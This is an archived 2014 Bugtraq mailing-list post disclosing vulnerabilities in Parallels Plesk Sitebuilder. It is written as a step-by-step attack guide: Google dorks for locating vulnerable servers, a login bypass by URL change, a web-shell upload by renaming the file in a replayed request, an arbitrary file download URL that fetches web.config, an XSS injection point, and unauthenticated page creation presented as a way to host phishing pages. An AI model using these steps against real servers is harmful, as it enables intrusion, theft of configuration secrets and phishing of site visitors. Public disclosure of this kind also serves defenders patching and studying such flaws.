lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201407230515.s6N5Fqsn024901@sf01web1.securityfocus.com>
Date: Wed, 23 Jul 2014 05:15:52 GMT
From: cseye_ut@...oo.com
To: bugtraq@...urityfocus.com
Subject: Multiple Vulnerabilities in Parallels® Plesk Sitebuilder

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder
# Author : alieye
# vendor : http://www.parallels.com/
# Contact : cseye_ut@...oo.com
# Risk : High
# Class: Remote
#
# Google Dork: 
# inurl::2006/Sites ext:aspx
# inurl::2006 inurl:.ashx?mediaid
# intext:"© Copyright 2004-2007 SWsoft." ext:aspx
# inurl:Wizard/HostingPreview.aspx?SiteID
#
# Date: 23/07/2014
# os : windows server 2003
# poc video clip : http://alieye.persiangig.com/video/plesk.rar/download
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++



1-bypass loginpage (all version)
http://victim.com:2006/login.aspx
change url path to http://victim.com:2006/wizard

---------------------------------------------------------

2-uploading shell via Live HTTP Headers(version "2004-2007")


Tools Needed: Live HTTP Headers, Backdoor Shell

Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx
Step 2: Rename your shell to shell.asp.gif and start capturing data with
Live HTTP Headers
Step 3: Replay data with Live HTTP Headers -
Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n]
Step 5: go to shell path:
http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp

---------------------------------------------------------

3-Arbitrary File Download Vulnerability(all version)
You can download any file from your target

http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename

example: 
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config

---------------------------------------------------------

4-xss(all version)
you can inject xss code in all module of this page http://sitebuilder.cp.collaborationhost.net/Wizard/Edit.aspx
goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :)

---------------------------------------------------------

5-not authentication for making a website(all version)
making malicious page and phishing page with these paths 
http://victim.com:2006/Wizard/Pages.aspx
http://victim.com:2006/Wizard/Edit.aspx

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir
[#] Thanks To All cseye members and All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To Master of Persian Music: Hossein Alizadeh
[#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/
[#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ